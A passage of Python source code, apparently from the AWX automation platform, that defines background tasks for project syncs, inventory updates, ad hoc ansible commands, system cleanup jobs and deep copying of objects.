logger.warning('Galaxy role/collection syncing is enabled, but no ' f'credentials are configured for {project_update.project.organization}.')
extra_vars.update(
{
'projects_root': settings.PROJECTS_ROOT.rstrip('/'),
'local_path': os.path.basename(project_update.project.local_path),
'project_path': project_update.get_project_path(check_if_exists=False), # deprecated
'insights_url': settings.INSIGHTS_URL_BASE,
'awx_license_type': get_license().get('license_type', 'UNLICENSED'),
'awx_version': get_awx_version(),
'scm_url': scm_url,
'scm_branch': scm_branch,
'scm_clean': project_update.scm_clean,
'scm_track_submodules': project_update.scm_track_submodules,
'roles_enabled': galaxy_creds_are_defined and settings.AWX_ROLES_ENABLED,
'collections_enabled': galaxy_creds_are_defined and settings.AWX_COLLECTIONS_ENABLED,
}
)
# apply custom refspec from user for PR refs and the like
if project_update.scm_refspec:
extra_vars['scm_refspec'] = project_update.scm_refspec
elif project_update.project.allow_override:
# If branch is override-able, do extra fetch for all branches
extra_vars['scm_refspec'] = 'refs/heads/*:refs/remotes/origin/*'
if project_update.scm_type == 'archive':
# for raw archive, prevent error moving files between volumes
extra_vars['ansible_remote_tmp'] = os.path.join(project_update.get_project_path(check_if_exists=False), '.ansible_awx', 'tmp')
self._write_extra_vars_file(private_data_dir, extra_vars)
def build_cwd(self, project_update, private_data_dir):
return os.path.join(private_data_dir, 'project')
def build_playbook_path_relative_to_cwd(self, project_update, private_data_dir):
return os.path.join('project_update.yml')
def get_password_prompts(self, passwords={}):
d = super(RunProjectUpdate, self).get_password_prompts(passwords)
d[r'Username for.*:\s*?$'] = 'scm_username'
d[r'Password for.*:\s*?$'] = 'scm_password'
d[r'Password:\s*?$'] = 'scm_password'
d[r'\S+?@\S+?\'s\s+?password:\s*?$'] = 'scm_password'
d[r'Enter passphrase for .*:\s*?$'] = 'scm_key_unlock'
d[r'Bad passphrase, try again for .*:\s*?$'] = ''
# FIXME: Configure whether we should auto accept host keys?
d[r'^Are you sure you want to continue connecting \(yes/no\)\?\s*?$'] = 'yes'
return d
def _update_dependent_inventories(self, project_update, dependent_inventory_sources):
scm_revision = project_update.project.scm_revision
inv_update_class = InventoryUpdate._get_task_class()
for inv_src in dependent_inventory_sources:
if not inv_src.update_on_project_update:
continue
if inv_src.scm_last_revision == scm_revision:
logger.debug('Skipping SCM inventory update for `{}` because ' 'project has not changed.'.format(inv_src.name))
continue
logger.debug('Local dependent inventory update for `{}`.'.format(inv_src.name))
with transaction.atomic():
if InventoryUpdate.objects.filter(inventory_source=inv_src, status__in=ACTIVE_STATES).exists():
logger.debug('Skipping SCM inventory update for `{}` because ' 'another update is already active.'.format(inv_src.name))
continue
local_inv_update = inv_src.create_inventory_update(
_eager_fields=dict(
launch_type='scm',
status='running',
instance_group=project_update.instance_group,
execution_node=project_update.execution_node,
source_project_update=project_update,
celery_task_id=project_update.celery_task_id,
)
)
try:
inv_update_class().run(local_inv_update.id)
except Exception:
logger.exception('{} Unhandled exception updating dependent SCM inventory sources.'.format(project_update.log_format))
try:
project_update.refresh_from_db()
except ProjectUpdate.DoesNotExist:
logger.warning('Project update deleted during updates of dependent SCM inventory sources.')
break
try:
local_inv_update.refresh_from_db()
except InventoryUpdate.DoesNotExist:
logger.warning('%s Dependent inventory update deleted during execution.', project_update.log_format)
continue
if project_update.cancel_flag:
logger.info('Project update {} was canceled while updating dependent inventories.'.format(project_update.log_format))
break
if local_inv_update.cancel_flag:
logger.info('Continuing to process project dependencies after {} was canceled'.format(local_inv_update.log_format))
if local_inv_update.status == 'successful':
inv_src.scm_last_revision = scm_revision
inv_src.save(update_fields=['scm_last_revision'])
def release_lock(self, instance):
try:
fcntl.lockf(self.lock_fd, fcntl.LOCK_UN)
except IOError as e:
logger.error("I/O error({0}) while trying to release lock file [{1}]: {2}".format(e.errno, instance.get_lock_file(), e.strerror))
os.close(self.lock_fd)
raise
os.close(self.lock_fd)
self.lock_fd = None
'''
Note: We don't support blocking=False
'''
def acquire_lock(self, instance, blocking=True):
lock_path = instance.get_lock_file()
if lock_path is None:
# If from migration or someone blanked local_path for any other reason, recoverable by save
instance.save()
lock_path = instance.get_lock_file()
if lock_path is None:
raise RuntimeError(u'Invalid lock file path')
try:
self.lock_fd = os.open(lock_path, os.O_RDWR | os.O_CREAT)
except OSError as e:
logger.error("I/O error({0}) while trying to open lock file [{1}]: {2}".format(e.errno, lock_path, e.strerror))
raise
start_time = time.time()
while True:
try:
instance.refresh_from_db(fields=['cancel_flag'])
if instance.cancel_flag:
logger.debug("ProjectUpdate({0}) was canceled".format(instance.pk))
return
fcntl.lockf(self.lock_fd, fcntl.LOCK_EX | fcntl.LOCK_NB)
break
except IOError as e:
if e.errno not in (errno.EAGAIN, errno.EACCES):
os.close(self.lock_fd)
logger.error("I/O error({0}) while trying to aquire lock on file [{1}]: {2}".format(e.errno, lock_path, e.strerror))
raise
else:
time.sleep(1.0)
waiting_time = time.time() - start_time
if waiting_time > 1.0:
logger.info('{} spent {} waiting to acquire lock for local source tree ' 'for path {}.'.format(instance.log_format, waiting_time, lock_path))
def pre_run_hook(self, instance, private_data_dir):
super(RunProjectUpdate, self).pre_run_hook(instance, private_data_dir)
# re-create root project folder if a natural disaster has destroyed it
if not os.path.exists(settings.PROJECTS_ROOT):
os.mkdir(settings.PROJECTS_ROOT)
project_path = instance.project.get_project_path(check_if_exists=False)
if not os.path.exists(project_path):
os.makedirs(project_path) # used as container mount
self.acquire_lock(instance)
self.original_branch = None
if instance.scm_type == 'git' and instance.branch_override:
if os.path.exists(project_path):
git_repo = git.Repo(project_path)
if git_repo.head.is_detached:
self.original_branch = git_repo.head.commit
else:
self.original_branch = git_repo.active_branch
stage_path = os.path.join(instance.get_cache_path(), 'stage')
if os.path.exists(stage_path):
logger.warning('{0} unexpectedly existed before update'.format(stage_path))
shutil.rmtree(stage_path)
os.makedirs(stage_path) # presence of empty cache indicates lack of roles or collections
# the project update playbook is not in a git repo, but uses a vendoring directory
# to be consistent with the ansible-runner model,
# that is moved into the runner project folder here
awx_playbooks = self.get_path_to('..', 'playbooks')
copy_tree(awx_playbooks, os.path.join(private_data_dir, 'project'))
@staticmethod
def clear_project_cache(cache_dir, keep_value):
if os.path.isdir(cache_dir):
for entry in os.listdir(cache_dir):
old_path = os.path.join(cache_dir, entry)
if entry not in (keep_value, 'stage'):
# invalidate, then delete
new_path = os.path.join(cache_dir, '.~~delete~~' + entry)
try:
os.rename(old_path, new_path)
shutil.rmtree(new_path)
except OSError:
logger.warning(f"Could not remove cache directory {old_path}")
@staticmethod
def make_local_copy(p, job_private_data_dir, scm_revision=None):
"""Copy project content (roles and collections) to a job private_data_dir
:param object p: Either a project or a project update
:param str job_private_data_dir: The root of the target ansible-runner folder
:param str scm_revision: For branch_override cases, the git revision to copy
"""
project_path = p.get_project_path(check_if_exists=False)
destination_folder = os.path.join(job_private_data_dir, 'project')
if not scm_revision:
scm_revision = p.scm_revision
if p.scm_type == 'git':
git_repo = git.Repo(project_path)
if not os.path.exists(destination_folder):
os.mkdir(destination_folder, stat.S_IREAD | stat.S_IWRITE | stat.S_IEXEC)
tmp_branch_name = 'awx_internal/{}'.format(uuid4())
# always clone based on specific job revision
if not p.scm_revision:
raise RuntimeError('Unexpectedly could not determine a revision to run from project.')
source_branch = git_repo.create_head(tmp_branch_name, p.scm_revision)
# git clone must take file:// syntax for source repo or else options like depth will be ignored
source_as_uri = Path(project_path).as_uri()
git.Repo.clone_from(
source_as_uri,
destination_folder,
branch=source_branch,
depth=1,
single_branch=True, # shallow, do not copy full history
)
# submodules copied in loop because shallow copies from local HEADs are ideal
# and no git clone submodule options are compatible with minimum requirements
for submodule in git_repo.submodules:
subrepo_path = os.path.abspath(os.path.join(project_path, submodule.path))
subrepo_destination_folder = os.path.abspath(os.path.join(destination_folder, submodule.path))
subrepo_uri = Path(subrepo_path).as_uri()
git.Repo.clone_from(subrepo_uri, subrepo_destination_folder, depth=1, single_branch=True)
# force option is necessary because remote refs are not counted, although no information is lost
git_repo.delete_head(tmp_branch_name, force=True)
else:
copy_tree(project_path, destination_folder, preserve_symlinks=1)
# copy over the roles and collection cache to job folder
cache_path = os.path.join(p.get_cache_path(), p.cache_id)
subfolders = []
if settings.AWX_COLLECTIONS_ENABLED:
subfolders.append('requirements_collections')
if settings.AWX_ROLES_ENABLED:
subfolders.append('requirements_roles')
for subfolder in subfolders:
cache_subpath = os.path.join(cache_path, subfolder)
if os.path.exists(cache_subpath):
dest_subpath = os.path.join(job_private_data_dir, subfolder)
copy_tree(cache_subpath, dest_subpath, preserve_symlinks=1)
logger.debug('{0} {1} prepared {2} from cache'.format(type(p).__name__, p.pk, dest_subpath))
def post_run_hook(self, instance, status):
super(RunProjectUpdate, self).post_run_hook(instance, status)
# To avoid hangs, very important to release lock even if errors happen here
try:
if self.playbook_new_revision:
instance.scm_revision = self.playbook_new_revision
instance.save(update_fields=['scm_revision'])
# Roles and collection folders copy to durable cache
base_path = instance.get_cache_path()
stage_path = os.path.join(base_path, 'stage')
if status == 'successful' and 'install_' in instance.job_tags:
# Clear other caches before saving this one, and if branch is overridden
# do not clear cache for main branch, but do clear it for other branches
self.clear_project_cache(base_path, keep_value=instance.project.cache_id)
cache_path = os.path.join(base_path, instance.cache_id)
if os.path.exists(stage_path):
if os.path.exists(cache_path):
logger.warning('Rewriting cache at {0}, performance may suffer'.format(cache_path))
shutil.rmtree(cache_path)
os.rename(stage_path, cache_path)
logger.debug('{0} wrote to cache at {1}'.format(instance.log_format, cache_path))
elif os.path.exists(stage_path):
shutil.rmtree(stage_path) # cannot trust content update produced
if self.job_private_data_dir:
if status == 'successful':
# copy project folder before resetting to default branch
# because some git-tree-specific resources (like submodules) might matter
self.make_local_copy(instance, self.job_private_data_dir)
if self.original_branch:
# for git project syncs, non-default branches can be problems
# restore to branch the repo was on before this run
try:
self.original_branch.checkout()
except Exception:
# this could have failed due to dirty tree, but difficult to predict all cases
logger.exception('Failed to restore project repo to prior state after {}'.format(instance.log_format))
finally:
self.release_lock(instance)
p = instance.project
if instance.job_type == 'check' and status not in (
'failed',
'canceled',
):
if self.playbook_new_revision:
p.scm_revision = self.playbook_new_revision
else:
if status == 'successful':
logger.error("{} Could not find scm revision in check".format(instance.log_format))
p.playbook_files = p.playbooks
p.inventory_files = p.inventories
p.save(update_fields=['scm_revision', 'playbook_files', 'inventory_files'])
# Update any inventories that depend on this project
dependent_inventory_sources = p.scm_inventory_sources.filter(update_on_project_update=True)
if len(dependent_inventory_sources) > 0:
if status == 'successful' and instance.launch_type != 'sync':
self._update_dependent_inventories(instance, dependent_inventory_sources)
def build_execution_environment_params(self, instance, private_data_dir):
if settings.IS_K8S:
return {}
params = super(RunProjectUpdate, self).build_execution_environment_params(instance, private_data_dir)
project_path = instance.get_project_path(check_if_exists=False)
cache_path = instance.get_cache_path()
params.setdefault('container_volume_mounts', [])
params['container_volume_mounts'].extend(
[
f"{project_path}:{project_path}:Z",
f"{cache_path}:{cache_path}:Z",
]
)
return params
@task(queue=get_local_queuename)
class RunInventoryUpdate(BaseTask):
model = InventoryUpdate
event_model = InventoryUpdateEvent
event_data_key = 'inventory_update_id'
def build_private_data(self, inventory_update, private_data_dir):
"""
Return private data needed for inventory update.
Returns a dict of the form
{
'credentials': {
<awx.main.models.Credential>: <credential_decrypted_ssh_key_data>,
<awx.main.models.Credential>: <credential_decrypted_ssh_key_data>,
<awx.main.models.Credential>: <credential_decrypted_ssh_key_data>
}
}
If no private data is needed, return None.
"""
if inventory_update.source in InventorySource.injectors:
injector = InventorySource.injectors[inventory_update.source]()
return injector.build_private_data(inventory_update, private_data_dir)
def build_env(self, inventory_update, private_data_dir, isolated, private_data_files=None):
"""Build environment dictionary for ansible-inventory.
Most environment variables related to credentials or configuration
are accomplished by the inventory source injectors (in this method)
or custom credential type injectors (in main run method).
"""
env = super(RunInventoryUpdate, self).build_env(inventory_update, private_data_dir, isolated, private_data_files=private_data_files)
if private_data_files is None:
private_data_files = {}
# Pass inventory source ID to inventory script.
env['INVENTORY_SOURCE_ID'] = str(inventory_update.inventory_source_id)
env['INVENTORY_UPDATE_ID'] = str(inventory_update.pk)
env.update(STANDARD_INVENTORY_UPDATE_ENV)
injector = None
if inventory_update.source in InventorySource.injectors:
injector = InventorySource.injectors[inventory_update.source]()
if injector is not None:
env = injector.build_env(inventory_update, env, private_data_dir, private_data_files)
# All CLOUD_PROVIDERS sources implement as inventory plugin from collection
env['ANSIBLE_INVENTORY_ENABLED'] = 'auto'
if inventory_update.source in ['scm', 'custom']:
for env_k in inventory_update.source_vars_dict:
if str(env_k) not in env and str(env_k) not in settings.INV_ENV_VARIABLE_BLOCKED:
env[str(env_k)] = str(inventory_update.source_vars_dict[env_k])
elif inventory_update.source == 'file':
raise NotImplementedError('Cannot update file sources through the task system.')
if inventory_update.source == 'scm' and inventory_update.source_project_update:
env_key = 'ANSIBLE_COLLECTIONS_PATHS'
config_setting = 'collections_paths'
folder = 'requirements_collections'
default = '~/.ansible/collections:/usr/share/ansible/collections'
config_values = read_ansible_config(os.path.join(private_data_dir, 'project'), [config_setting])
paths = default.split(':')
if env_key in env:
for path in env[env_key].split(':'):
if path not in paths:
paths = [env[env_key]] + paths
elif config_setting in config_values:
for path in config_values[config_setting].split(':'):
if path not in paths:
paths = [config_values[config_setting]] + paths
# FIXME: containers
paths = [os.path.join('/runner', folder)] + paths
env[env_key] = os.pathsep.join(paths)
return env
def write_args_file(self, private_data_dir, args):
path = os.path.join(private_data_dir, 'args')
handle = os.open(path, os.O_RDWR | os.O_CREAT, stat.S_IREAD | stat.S_IWRITE)
f = os.fdopen(handle, 'w')
f.write(' '.join(args))
f.close()
os.chmod(path, stat.S_IRUSR)
return path
def build_args(self, inventory_update, private_data_dir, passwords):
"""Build the command line argument list for running an inventory
import.
"""
# Get the inventory source and inventory.
inventory_source = inventory_update.inventory_source
inventory = inventory_source.inventory
if inventory is None:
raise RuntimeError('Inventory Source is not associated with an Inventory.')
args = ['ansible-inventory', '--list', '--export']
# Add arguments for the source inventory file/script/thing
rel_path = self.pseudo_build_inventory(inventory_update, private_data_dir)
container_location = os.path.join('/runner', rel_path) # TODO: make container paths elegant
source_location = os.path.join(private_data_dir, rel_path)
args.append('-i')
args.append(container_location)
args.append('--output')
args.append(os.path.join('/runner', 'artifacts', str(inventory_update.id), 'output.json'))
if os.path.isdir(source_location):
playbook_dir = container_location
else:
playbook_dir = os.path.dirname(container_location)
args.extend(['--playbook-dir', playbook_dir])
if inventory_update.verbosity:
args.append('-' + 'v' * min(5, inventory_update.verbosity * 2 + 1))
return args
def build_inventory(self, inventory_update, private_data_dir):
return None # what runner expects in order to not deal with inventory
def pseudo_build_inventory(self, inventory_update, private_data_dir):
"""Inventory imports are ran through a management command
we pass the inventory in args to that command, so this is not considered
to be "Ansible" inventory (by runner) even though it is
Eventually, we would like to cut out the management command,
and thus use this as the real inventory
"""
src = inventory_update.source
injector = None
if inventory_update.source in InventorySource.injectors:
injector = InventorySource.injectors[src]()
if injector is not None:
content = injector.inventory_contents(inventory_update, private_data_dir)
# must be a statically named file
inventory_path = os.path.join(private_data_dir, injector.filename)
with open(inventory_path, 'w') as f:
f.write(content)
os.chmod(inventory_path, stat.S_IRUSR | stat.S_IWUSR | stat.S_IXUSR)
rel_path = injector.filename
elif src == 'scm':
rel_path = os.path.join('project', inventory_update.source_path)
elif src == 'custom':
handle, inventory_path = tempfile.mkstemp(dir=private_data_dir)
f = os.fdopen(handle, 'w')
if inventory_update.source_script is None:
raise RuntimeError('Inventory Script does not exist')
f.write(inventory_update.source_script.script)
f.close()
os.chmod(inventory_path, stat.S_IRUSR | stat.S_IWUSR | stat.S_IXUSR)
rel_path = os.path.split(inventory_path)[-1]
return rel_path
def build_cwd(self, inventory_update, private_data_dir):
"""
There is one case where the inventory "source" is in a different
location from the private data:
- SCM, where source needs to live in the project folder
"""
src = inventory_update.source
container_dir = '/runner' # TODO: make container paths elegant
if src == 'scm' and inventory_update.source_project_update:
return os.path.join(container_dir, 'project')
return container_dir
def build_playbook_path_relative_to_cwd(self, inventory_update, private_data_dir):
return None
def build_credentials_list(self, inventory_update):
# All credentials not used by inventory source injector
return inventory_update.get_extra_credentials()
def pre_run_hook(self, inventory_update, private_data_dir):
super(RunInventoryUpdate, self).pre_run_hook(inventory_update, private_data_dir)
source_project = None
if inventory_update.inventory_source:
source_project = inventory_update.inventory_source.source_project
if (
inventory_update.source == 'scm' and inventory_update.launch_type != 'scm' and source_project and source_project.scm_type
): # never ever update manual projects
# Check if the content cache exists, so that we do not unnecessarily re-download roles
sync_needs = ['update_{}'.format(source_project.scm_type)]
has_cache = os.path.exists(os.path.join(source_project.get_cache_path(), source_project.cache_id))
# Galaxy requirements are not supported for manual projects
if not has_cache:
sync_needs.extend(['install_roles', 'install_collections'])
local_project_sync = source_project.create_project_update(
_eager_fields=dict(
launch_type="sync",
job_type='run',
job_tags=','.join(sync_needs),
status='running',
execution_node=inventory_update.execution_node,
instance_group=inventory_update.instance_group,
celery_task_id=inventory_update.celery_task_id,
)
)
# associate the inventory update before calling run() so that a
# cancel() call on the inventory update can cancel the project update
local_project_sync.scm_inventory_updates.add(inventory_update)
project_update_task = local_project_sync._get_task_class()
try:
sync_task = project_update_task(job_private_data_dir=private_data_dir)
sync_task.run(local_project_sync.id)
local_project_sync.refresh_from_db()
inventory_update.inventory_source.scm_last_revision = local_project_sync.scm_revision
inventory_update.inventory_source.save(update_fields=['scm_last_revision'])
except Exception:
inventory_update = self.update_model(
inventory_update.pk,
status='failed',
job_explanation=(
'Previous Task Failed: {"job_type": "%s", "job_name": "%s", "job_id": "%s"}'
% ('project_update', local_project_sync.name, local_project_sync.id)
),
)
raise
elif inventory_update.source == 'scm' and inventory_update.launch_type == 'scm' and source_project:
# This follows update, not sync, so make copy here
RunProjectUpdate.make_local_copy(source_project, private_data_dir)
def post_run_hook(self, inventory_update, status):
super(RunInventoryUpdate, self).post_run_hook(inventory_update, status)
if status != 'successful':
return # nothing to save, step out of the way to allow error reporting
private_data_dir = inventory_update.job_env['AWX_PRIVATE_DATA_DIR']
expected_output = os.path.join(private_data_dir, 'artifacts', 'output.json')
with open(expected_output) as f:
data = json.load(f)
# build inventory save options
options = dict(
overwrite=inventory_update.overwrite,
overwrite_vars=inventory_update.overwrite_vars,
)
src = inventory_update.source
if inventory_update.enabled_var:
options['enabled_var'] = inventory_update.enabled_var
options['enabled_value'] = inventory_update.enabled_value
else:
if getattr(settings, '%s_ENABLED_VAR' % src.upper(), False):
options['enabled_var'] = getattr(settings, '%s_ENABLED_VAR' % src.upper())
if getattr(settings, '%s_ENABLED_VALUE' % src.upper(), False):
options['enabled_value'] = getattr(settings, '%s_ENABLED_VALUE' % src.upper())
if inventory_update.host_filter:
options['host_filter'] = inventory_update.host_filter
if getattr(settings, '%s_EXCLUDE_EMPTY_GROUPS' % src.upper()):
options['exclude_empty_groups'] = True
if getattr(settings, '%s_INSTANCE_ID_VAR' % src.upper(), False):
options['instance_id_var'] = getattr(settings, '%s_INSTANCE_ID_VAR' % src.upper())
# Verbosity is applied to saving process, as well as ansible-inventory CLI option
if inventory_update.verbosity:
options['verbosity'] = inventory_update.verbosity
handler = SpecialInventoryHandler(
self.event_handler,
self.cancel_callback,
verbosity=inventory_update.verbosity,
job_timeout=self.get_instance_timeout(self.instance),
start_time=inventory_update.started,
counter=self.event_ct,
initial_line=self.end_line,
)
inv_logger = logging.getLogger('awx.main.commands.inventory_import')
formatter = inv_logger.handlers[0].formatter
formatter.job_start = inventory_update.started
handler.formatter = formatter
inv_logger.handlers[0] = handler
from awx.main.management.commands.inventory_import import Command as InventoryImportCommand
cmd = InventoryImportCommand()
try:
# save the inventory data to database.
# canceling exceptions will be handled in the global post_run_hook
cmd.perform_update(options, data, inventory_update)
except PermissionDenied as exc:
logger.exception('License error saving {} content'.format(inventory_update.log_format))
raise PostRunError(str(exc), status='error')
except PostRunError:
logger.exception('Error saving {} content, rolling back changes'.format(inventory_update.log_format))
raise
except Exception:
logger.exception('Exception saving {} content, rolling back changes.'.format(inventory_update.log_format))
raise PostRunError('Error occured while saving inventory data, see traceback or server logs', status='error', tb=traceback.format_exc())
@task(queue=get_local_queuename)
class RunAdHocCommand(BaseTask):
"""
Run an ad hoc command using ansible.
"""
model = AdHocCommand
event_model = AdHocCommandEvent
event_data_key = 'ad_hoc_command_id'
def build_private_data(self, ad_hoc_command, private_data_dir):
"""
Return SSH private key data needed for this ad hoc command (only if
stored in DB as ssh_key_data).
Returns a dict of the form
{
'credentials': {
<awx.main.models.Credential>: <credential_decrypted_ssh_key_data>,
<awx.main.models.Credential>: <credential_decrypted_ssh_key_data>,
...
},
'certificates': {
<awx.main.models.Credential>: <signed SSH certificate data>,
<awx.main.models.Credential>: <signed SSH certificate data>,
...
}
}
"""
# If we were sent SSH credentials, decrypt them and send them
# back (they will be written to a temporary file).
creds = ad_hoc_command.credential
private_data = {'credentials': {}}
if creds and creds.has_input('ssh_key_data'):
private_data['credentials'][creds] = creds.get_input('ssh_key_data', default='')
if creds and creds.has_input('ssh_public_key_data'):
private_data.setdefault('certificates', {})[creds] = creds.get_input('ssh_public_key_data', default='')
return private_data
def build_passwords(self, ad_hoc_command, runtime_passwords):
"""
Build a dictionary of passwords for SSH private key, SSH user and
sudo/su.
"""
passwords = super(RunAdHocCommand, self).build_passwords(ad_hoc_command, runtime_passwords)
cred = ad_hoc_command.credential
if cred:
for field in ('ssh_key_unlock', 'ssh_password', 'become_password'):
value = runtime_passwords.get(field, cred.get_input('password' if field == 'ssh_password' else field, default=''))
if value not in ('', 'ASK'):
passwords[field] = value
return passwords
def build_env(self, ad_hoc_command, private_data_dir, isolated=False, private_data_files=None):
"""
Build environment dictionary for ansible.
"""
env = super(RunAdHocCommand, self).build_env(ad_hoc_command, private_data_dir, isolated=isolated, private_data_files=private_data_files)
# Set environment variables needed for inventory and ad hoc event
# callbacks to work.
env['AD_HOC_COMMAND_ID'] = str(ad_hoc_command.pk)
env['INVENTORY_ID'] = str(ad_hoc_command.inventory.pk)
env['INVENTORY_HOSTVARS'] = str(True)
env['ANSIBLE_LOAD_CALLBACK_PLUGINS'] = '1'
env['ANSIBLE_SFTP_BATCH_MODE'] = 'False'
# Create a directory for ControlPath sockets that is unique to each
# ad hoc command
cp_dir = os.path.join(private_data_dir, 'cp')
if not os.path.exists(cp_dir):
os.mkdir(cp_dir, 0o700)
# FIXME: more elegant way to manage this path in container
env['ANSIBLE_SSH_CONTROL_PATH'] = '/runner/cp'
return env
def build_args(self, ad_hoc_command, private_data_dir, passwords):
"""
Build command line argument list for running ansible, optionally using
ssh-agent for public/private key authentication.
"""
creds = ad_hoc_command.credential
ssh_username, become_username, become_method = '', '', ''
if creds:
ssh_username = creds.get_input('username', default='')
become_method = creds.get_input('become_method', default='')
become_username = creds.get_input('become_username', default='')
else:
become_method = None
become_username = ""
# Always specify the normal SSH user as root by default. Since this
# task is normally running in the background under a service account,
# it doesn't make sense to rely on ansible's default of using the
# current user.
ssh_username = ssh_username or 'root'
args = []
if ad_hoc_command.job_type == 'check':
args.append('--check')
args.extend(['-u', sanitize_jinja(ssh_username)])
if 'ssh_password' in passwords:
args.append('--ask-pass')
# We only specify sudo/su user and password if explicitly given by the
# credential. Credential should never specify both sudo and su.
if ad_hoc_command.become_enabled:
args.append('--become')
if become_method:
args.extend(['--become-method', sanitize_jinja(become_method)])
if become_username:
args.extend(['--become-user', sanitize_jinja(become_username)])
if 'become_password' in passwords:
args.append('--ask-become-pass')
if ad_hoc_command.forks: # FIXME: Max limit?
args.append('--forks=%d' % ad_hoc_command.forks)
if ad_hoc_command.diff_mode:
args.append('--diff')
if ad_hoc_command.verbosity:
args.append('-%s' % ('v' * min(5, ad_hoc_command.verbosity)))
extra_vars = ad_hoc_command.awx_meta_vars()
if ad_hoc_command.extra_vars_dict:
redacted_extra_vars, removed_vars = extract_ansible_vars(ad_hoc_command.extra_vars_dict)
if removed_vars:
raise ValueError(_("{} are prohibited from use in ad hoc commands.").format(", ".join(removed_vars)))
extra_vars.update(ad_hoc_command.extra_vars_dict)
if ad_hoc_command.limit:
args.append(ad_hoc_command.limit)
else:
args.append('all')
return args
def build_extra_vars_file(self, ad_hoc_command, private_data_dir):
extra_vars = ad_hoc_command.awx_meta_vars()
if ad_hoc_command.extra_vars_dict:
redacted_extra_vars, removed_vars = extract_ansible_vars(ad_hoc_command.extra_vars_dict)
if removed_vars:
raise ValueError(_("{} are prohibited from use in ad hoc commands.").format(", ".join(removed_vars)))
extra_vars.update(ad_hoc_command.extra_vars_dict)
self._write_extra_vars_file(private_data_dir, extra_vars)
def build_module_name(self, ad_hoc_command):
return ad_hoc_command.module_name
def build_module_args(self, ad_hoc_command):
module_args = ad_hoc_command.module_args
if settings.ALLOW_JINJA_IN_EXTRA_VARS != 'always':
module_args = sanitize_jinja(module_args)
return module_args
def build_cwd(self, ad_hoc_command, private_data_dir):
return private_data_dir
def build_playbook_path_relative_to_cwd(self, job, private_data_dir):
return None
def get_password_prompts(self, passwords={}):
d = super(RunAdHocCommand, self).get_password_prompts()
d[r'Enter passphrase for .*:\s*?$'] = 'ssh_key_unlock'
d[r'Bad passphrase, try again for .*:\s*?$'] = ''
for method in PRIVILEGE_ESCALATION_METHODS:
d[r'%s password.*:\s*?$' % (method[0])] = 'become_password'
d[r'%s password.*:\s*?$' % (method[0].upper())] = 'become_password'
d[r'BECOME password.*:\s*?$'] = 'become_password'
d[r'SSH password:\s*?$'] = 'ssh_password'
d[r'Password:\s*?$'] = 'ssh_password'
return d
def final_run_hook(self, adhoc_job, status, private_data_dir, fact_modification_times, isolated_manager_instance=None):
super(RunAdHocCommand, self).final_run_hook(adhoc_job, status, private_data_dir, fact_modification_times)
if isolated_manager_instance:
isolated_manager_instance.cleanup()
@task(queue=get_local_queuename)
class RunSystemJob(BaseTask):
model = SystemJob
event_model = SystemJobEvent
event_data_key = 'system_job_id'
def build_execution_environment_params(self, system_job, private_data_dir):
return {}
def build_args(self, system_job, private_data_dir, passwords):
args = ['awx-manage', system_job.job_type]
try:
# System Job extra_vars can be blank, must be JSON if not blank
if system_job.extra_vars == '':
json_vars = {}
else:
json_vars = json.loads(system_job.extra_vars)
if system_job.job_type in ('cleanup_jobs', 'cleanup_activitystream'):
if 'days' in json_vars:
args.extend(['--days', str(json_vars.get('days', 60))])
if 'dry_run' in json_vars and json_vars['dry_run']:
args.extend(['--dry-run'])
if system_job.job_type == 'cleanup_jobs':
args.extend(
['--jobs', '--project-updates', '--inventory-updates', '--management-jobs', '--ad-hoc-commands', '--workflow-jobs', '--notifications']
)
except Exception:
logger.exception("{} Failed to parse system job".format(system_job.log_format))
return args
def write_args_file(self, private_data_dir, args):
path = os.path.join(private_data_dir, 'args')
handle = os.open(path, os.O_RDWR | os.O_CREAT, stat.S_IREAD | stat.S_IWRITE)
f = os.fdopen(handle, 'w')
f.write(' '.join(args))
f.close()
os.chmod(path, stat.S_IRUSR)
return path
def build_env(self, instance, private_data_dir, isolated=False, private_data_files=None):
base_env = super(RunSystemJob, self).build_env(instance, private_data_dir, isolated=isolated, private_data_files=private_data_files)
# TODO: this is able to run by turning off isolation
# the goal is to run it a container instead
env = dict(os.environ.items())
env.update(base_env)
return env
def build_cwd(self, instance, private_data_dir):
return settings.BASE_DIR
def build_playbook_path_relative_to_cwd(self, job, private_data_dir):
return None
def build_inventory(self, instance, private_data_dir):
return None
def _reconstruct_relationships(copy_mapping):
for old_obj, new_obj in copy_mapping.items():
model = type(old_obj)
for field_name in getattr(model, 'FIELDS_TO_PRESERVE_AT_COPY', []):
field = model._meta.get_field(field_name)
if isinstance(field, ForeignKey):
if getattr(new_obj, field_name, None):
continue
related_obj = getattr(old_obj, field_name)
related_obj = copy_mapping.get(related_obj, related_obj)
setattr(new_obj, field_name, related_obj)
elif field.many_to_many:
for related_obj in getattr(old_obj, field_name).all():
logger.debug('Deep copy: Adding {} to {}({}).{} relationship'.format(related_obj, new_obj, model, field_name))
getattr(new_obj, field_name).add(copy_mapping.get(related_obj, related_obj))
new_obj.save()
@task(queue=get_local_queuename)
def deep_copy_model_obj(model_module, model_name, obj_pk, new_obj_pk, user_pk, uuid, permission_check_func=None):
sub_obj_list = cache.get(uuid)
if sub_obj_list is None:
logger.error('Deep copy {} from {} to {} failed unexpectedly.'.format(model_name, obj_pk, new_obj_pk))
return
logger.debug('Deep copy {} from {} to {}.'.format(model_name, obj_pk, new_obj_pk))
from awx.api.generics import CopyAPIView
from awx.main.signals import disable_activity_stream
model = getattr(importlib.import_module(model_module), model_name, None)
if model is None:
return
try:
obj = model.objects.get(pk=obj_pk)
new_obj = model.objects.get(pk=new_obj_pk)
creater = User.objects.get(pk=user_pk)
except ObjectDoesNotExist:
logger.warning("Object or user no longer exists.")
return
with transaction.atomic(), ignore_inventory_computed_fields(), disable_activity_stream():
copy_mapping = {}
for sub_obj_setup in sub_obj_list:
sub_model = getattr(importlib.import_module(sub_obj_setup[0]), sub_obj_setup[1], None)
if sub_model is None:
continue
try:
sub_obj = sub_model.objects.get(pk=sub_obj_setup[2])
except ObjectDoesNotExist:
continue
copy_mapping.update(CopyAPIView.copy_model_obj(obj, new_obj, sub_model, sub_obj, creater))
_reconstruct_relationships(copy_mapping)
if permission_check_func:
permission_check_func = getattr(getattr(importlib.import_module(permission_check_func[0]), permission_check_func[1]), permission_check_func[2])
permission_check_func(creater, copy_mapping.values())
if isinstance(new_obj, Inventory):
update_inventory_computed_fields.delay(new_obj.id)
class AWXReceptorJob:
def __init__(self, task=None, runner_params=None):
self.task = task
self.runner_params = runner_params
self.unit_id = None
if self.task and not self.task.instance.is_container_group_task:
execution_environment_params = self.task.build_execution_environment_params(self.task.instance, runner_params['private_data_dir'])
